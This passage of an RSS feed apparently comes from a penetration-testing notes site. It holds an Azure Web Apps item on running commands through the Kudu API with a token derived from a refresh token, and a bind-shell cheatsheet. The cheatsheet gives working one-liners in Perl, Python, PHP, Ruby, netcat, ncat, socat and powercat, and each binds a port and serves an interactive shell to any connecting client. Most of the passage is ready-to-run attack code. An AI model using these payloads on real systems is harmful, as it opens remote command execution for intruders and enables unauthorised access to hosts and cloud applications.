&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Finally you should be able to connect via WinRM&lt;/p&gt;</description></item><item><title>Azure Services - Web Apps</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-web-apps/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-web-apps/</guid><description>&lt;h2 id="list-web-app" class="anchored-heading"&gt;List Web App&lt;a class="heading-anchor" href="#list-web-app" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;webapp&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="execute-commands" class="anchored-heading"&gt;Execute Commands&lt;a class="heading-anchor" href="#execute-commands" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$ARMToken&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-ARMTokenWithRefreshToken&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;-RefreshToken&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;0.ARwA6WgJJ9X2qk...&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;-TenantID&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;contoso.onmicrosoft.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-AzureRMWebAppShellCommand&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;-KuduURI&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://&amp;lt;webapp&amp;gt;.scm.azurewebsites.net/api/command&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;-Token&lt;/span&gt; &lt;span class="nv"&gt;$ARMToken&lt;/span&gt; &lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;-Command&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;whoami&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="ssh-connection" class="anchored-heading"&gt;SSH Connection&lt;a class="heading-anchor" href="#ssh-connection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;First check if the SSH over HTTP connection is enabled: &lt;code&gt;(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;webapp&lt;/span&gt; &lt;span class="nb"&gt;create-remote&lt;/span&gt;&lt;span class="n"&gt;-connection&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-subscription&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;SUBSCRIPTION-ID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-resource-group&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;RG-NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;APP-SERVICE&lt;/span&gt;&lt;span class="n"&gt;-NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="kudu" class="anchored-heading"&gt;Kudu&lt;a class="heading-anchor" href="#kudu" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your app’s environment, including access to application settings, log streams, and deployment management.&lt;/p&gt;</description></item><item><title>Bind Shell</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/shell-bind-cheatsheet/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/shell-bind-cheatsheet/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#bind-shell"&gt;Bind Shell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#perl"&gt;Perl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#php"&gt;PHP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby"&gt;Ruby&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#netcat-traditional"&gt;Netcat Traditional&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#netcat-openbsd"&gt;Netcat OpenBsd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ncat"&gt;Ncat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#socat"&gt;Socat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell"&gt;Powershell&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="perl" class="anchored-heading"&gt;Perl&lt;a class="heading-anchor" href="#perl" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-perl" data-lang="perl"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;perl&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="s"&gt;&amp;#39;use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&amp;#34;tcp&amp;#34;));\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s"&gt;bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s"&gt;close C){open(STDIN,&amp;#34;&amp;gt;&amp;amp;C&amp;#34;);open(STDOUT,&amp;#34;&amp;gt;&amp;amp;C&amp;#34;);open(STDERR,&amp;#34;&amp;gt;&amp;amp;C&amp;#34;);exec(&amp;#34;/bin/bash -i&amp;#34;);};&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="python" class="anchored-heading"&gt;Python&lt;a class="heading-anchor" href="#python" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Single line :&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;exec(&amp;#34;&amp;#34;&amp;#34;import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((&amp;#34;0.0.0.0&amp;#34;,51337));s1.listen(1);c,a=s1.accept();&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())&amp;#34;&amp;#34;&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Expanded version :&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;socket&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nn"&gt;s&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="nn"&gt;subprocess&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nn"&gt;sp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;s1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SOCK_STREAM&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;s1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setsockopt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SOL_SOCKET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SO_REUSEADDR&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;s1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;51337&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;s1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;accept&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Popen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;sp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PIPE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;sp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PIPE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stdin&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;sp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PIPE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sendall&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="php" class="anchored-heading"&gt;PHP&lt;a class="heading-anchor" href="#php" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-php" data-lang="php"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nx"&gt;php&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;r&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,&amp;#34;0.0.0.0&amp;#34;,51337);\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,&amp;#34;$ &amp;#34;,2))exit;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;$in=socket_read($cl,100);$cmd=popen(&amp;#34;$in&amp;#34;,&amp;#34;r&amp;#34;);while(!feof($cmd)){$m=fgetc($cmd);\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt; socket_write($cl,$m,strlen($m));}}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="ruby" class="anchored-heading"&gt;Ruby&lt;a class="heading-anchor" href="#ruby" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ruby" data-lang="ruby"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ruby&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;rsocket&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;f=TCPServer.new(51337);s=f.accept;exec sprintf(&amp;#34;/bin/sh -i &amp;lt;&amp;amp;%d &amp;gt;&amp;amp;%d 2&amp;gt;&amp;amp;%d&amp;#34;,s,s,s)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="netcat-traditional" class="anchored-heading"&gt;Netcat Traditional&lt;a class="heading-anchor" href="#netcat-traditional" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nc&lt;/span&gt; &lt;span class="n"&gt;-nlvp&lt;/span&gt; &lt;span class="mf"&gt;51337&lt;/span&gt; &lt;span class="n"&gt;-e&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="netcat-openbsd" class="anchored-heading"&gt;Netcat OpenBsd&lt;a class="heading-anchor" href="#netcat-openbsd" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;rm &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;tmp&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="n"&gt;mkfifo&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;tmp&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;tmp&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;|/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bash&lt;/span&gt; &lt;span class="n"&gt;-i&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;amp;&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="n"&gt;nc&lt;/span&gt; &lt;span class="n"&gt;-lvp&lt;/span&gt; &lt;span class="mf"&gt;51337&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;/&lt;/span&gt;&lt;span class="n"&gt;tmp&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="ncat" class="anchored-heading"&gt;Ncat&lt;a class="heading-anchor" href="#ncat" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ncat&lt;/span&gt; &lt;span class="n"&gt;-nlvp&lt;/span&gt; &lt;span class="mf"&gt;51337&lt;/span&gt; &lt;span class="n"&gt;-e&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="socat" class="anchored-heading"&gt;Socat&lt;a class="heading-anchor" href="#socat" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@attacker&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;socat&lt;/span&gt; &lt;span class="n"&gt;FILE&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;`&lt;/span&gt;&lt;span class="n"&gt;tty&lt;/span&gt;&lt;span class="p"&gt;`,&lt;/span&gt;&lt;span class="n"&gt;raw&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;echo&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;TCP&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;12345&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@victim&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;socat&lt;/span&gt; &lt;span class="nb"&gt;TCP-LISTEN&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;12345&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;reuseaddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;fork&lt;/span&gt; &lt;span class="n"&gt;EXEC&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sh&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;pty&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;setsid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sigint&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sane&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="powershell" class="anchored-heading"&gt;Powershell&lt;a class="heading-anchor" href="#powershell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;besimorhino&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;powercat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Victim (listen)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;powercat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powercat&lt;/span&gt; &lt;span class="n"&gt;-l&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;7002&lt;/span&gt; &lt;span class="n"&gt;-ep&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Connect from attacker&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;powercat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powercat&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;127.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;7002&lt;/span&gt;
